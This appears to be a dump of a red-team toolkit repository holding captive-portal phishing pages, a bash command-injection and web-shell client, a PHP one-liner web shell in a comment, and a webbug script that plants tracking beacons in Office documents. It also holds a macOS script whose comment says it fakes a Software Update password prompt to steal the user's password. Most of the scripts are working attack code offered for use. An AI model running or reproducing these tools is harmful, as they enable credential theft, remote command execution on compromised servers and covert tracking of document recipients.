├── Wireless └── Captive-Portals │ ├── fake-ap │ ├── auth │ │ ├── auth.log │ │ └── login.php │ └── index.html │ ├── pineapple │ ├── auth │ │ ├── auth.log │ │ └── login.php │ ├── splash.html │ ├── index.html │ └── js │ │ └── jquery.js │ └── README.md ├── PowerShell └── popuppwn.ps1 ├── Bash ├── webbug │ ├── files.txt │ ├── webbug.sh │ ├── README.md │ └── bugged-test-document.doc └── cmd-injector.sh ├── OSX └── popuppwn.sh ├── README.md └── LICENSE /Wireless/Captive-Portals/fake-ap/auth/auth.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Wireless/Captive-Portals/pineapple/auth/auth.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PowerShell/popuppwn.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gfoss/misc/HEAD/PowerShell/popuppwn.ps1 -------------------------------------------------------------------------------- /Bash/webbug/files.txt: -------------------------------------------------------------------------------- 1 | # Place files you would like to create+bug / bug within this directory in the following format: 2 | 3 | test1.doc 4 | test2.docx 5 | test3.xls 6 | test4.xlsx 7 | etc... -------------------------------------------------------------------------------- /OSX/popuppwn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Popup Pwn 4 | # Created by @FuzzyNop and showcased at DerbyCon 4, modified by @heinzarelli 5 | # http://www.irongeek.com/i.php?page=videos/derbycon4/t201-red-teaming-back-and-forth-5ever-fuzzynop 6 | # 7 | # OSX script to pop-up alert box on a host and attempt to steal the user's password. Looks like a system update. 8 | 9 | osascript -e 'tell app "System Preferences" to display dialog "Software Update requires that you enter your password to apply changes." & return & return & "Password:" default answer "" with icon 1 with hidden answer' -------------------------------------------------------------------------------- /Wireless/Captive-Portals/pineapple/splash.html: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 |
9 |Redirecting to logon server..
15 | 16 | -------------------------------------------------------------------------------- /Wireless/Captive-Portals/pineapple/auth/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Bash/cmd-injector.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Command Injector v0.1 4 | # greg.foss[at]owasp.org 5 | # 10/1/2014 6 | # 7 | # modified version of dirtshell by 'superkojiman' for exploiting command injection vulnerabilities / accessing web shells via cli 8 | # http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html 9 | # 10 | #=`$_GET[c]`?> 11 | 12 | function usage { 13 | echo "usage: -u URL" 14 | echo "eg : -u \"http://site.com/index.php?cmd=\"" 15 | } 16 | 17 | if [[ -z $1 ]]; then 18 | usage 19 | exit 0; 20 | fi 21 | 22 | url="" 23 | #url=base64_encode("") 24 | cmdfile="" 25 | rfifile="" 26 | 27 | while getopts "u:f:" OPT; do 28 | case $OPT in 29 | u) url=$OPTARG;; 30 | f) cmdfile=$OPTARG;; 31 | *) usage; exit 0;; 32 | esac 33 | done 34 | 35 | if [[ -z $url ]]; then 36 | usage 37 | exit 0; 38 | fi 39 | 40 | which curl &>/dev/null 41 | if [[ $? -ne 0 ]]; then 42 | echo "[!] curl needs to be installed to run this script" 43 | exit 1 44 | fi 45 | 46 | # read files from a file and print to stdout 47 | if [[ ! -z $cmdfile ]]; then 48 | if [[ -f $cmdfile ]]; then 49 | for i in $(cat $cmdfile); do 50 | echo "[+] requesting ${url}${i}" 51 | curl "${url}${i}" 52 | done 53 | fi 54 | else 55 | # interactive shell 56 | while :; do 57 | printf "[>] " 58 | read cmd 59 | echo "[+] requesting ${url}${cmd}" 60 | curl "${url}${cmd}" 61 | echo "" 62 | done 63 | fi 64 | -------------------------------------------------------------------------------- /Wireless/Captive-Portals/fake-ap/auth/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Bash/webbug/webbug.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # ---------------------------------------- 4 | # LogRhythm Labs - Document Bugger 5 | # greg.foss[at]logrhythm.com 6 | # v0.1 - 2/25/2015 7 | # 8 | # This script simply automates the process of embedding webbugs in documents 9 | # ---------------------------------------- 10 | 11 | # flat file with listing of documents to bug 12 | file=$1 13 | # server in the format: http://server.com/webbug-directory 14 | server=$2 15 | 16 | if [ -z $1 ] 17 | then 18 | echo "usage:" 19 | echo "webbug.sh [file] [server]" 20 | echo " file => file.txt" 21 | echo " server => http://server/webbug-directory" 22 | echo "" 23 | exit 0; 24 | fi 25 | 26 | files=$(cat $file) 27 | for doc in $files; do 28 | filename=$(echo $doc | cut -d"." -f1) 29 | ext=$(echo $doc | cut -d"." -f 2) 30 | if [ -f $doc ] 31 | then 32 | echo " [ + ] cloning $doc and injecting webbug into $filename-bugged.$ext" 33 | # webbug 34 | # this is really buggy and only works with HTML office documents... See here for more information: http://ha.ckers.org/webbug.html 35 | sed -e :a -e '$d;N;2,2ba' -e 'P;D' $doc >> $filename-bugged.$ext 36 | echo "